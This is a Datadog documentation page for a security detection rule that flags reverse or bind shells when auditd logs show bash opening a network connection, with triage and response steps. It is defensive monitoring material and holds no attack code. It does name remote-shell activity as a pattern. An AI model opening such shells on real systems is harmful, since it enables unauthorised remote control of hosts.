---
title: Auditd remote shell detected
description: Datadog, the leading service for cloud-scale monitoring.
breadcrumbs: Docs > Datadog Security > OOTB Rules > Auditd remote shell detected
---

# Auditd remote shell detected
Classification:attackTactic:[TA0011-command-and-control](https://attack.mitre.org/tactics/TA0011)Technique:[T1059-command-and-scripting-interpreter](https://attack.mitre.org/techniques/T1059) 
## Goal{% #goal %}

Detect reverse or bind shells by identifying a `bash` process making a network connection. This pattern is a strong indicator of an interactive shell being tunneled over a network connection, commonly used in post-exploitation.

## Strategy{% #strategy %}

This rule correlates two auditd events sharing the same `event_id`: a SYSCALL record showing `bash` (`/usr/bin/bash` or `/bin/bash`) executing a `connect` syscall (Network Activity, Open), and a SOCKADDR record containing the destination address. Requiring both records on the same audit event confirms a network socket was actually opened by the shell process.

## Triage and response{% #triage-and-response %}

1. Identify the remote endpoint from `{{@ocsf.dst_endpoint.ip}}` and `{{@ocsf.dst_endpoint.port}}` in the correlated SOCKADDR record.
1. Determine the user context of the shell process using `{{@ocsf.actor.user.name}}` on host `{{host}}`.
1. Check for signs of initial access: review authentication logs, web server logs, and any recently executed commands.
1. Isolate the host if a reverse shell is confirmed and begin incident response. Block the remote IP at the network perimeter.
1. Preserve forensic evidence before terminating the session.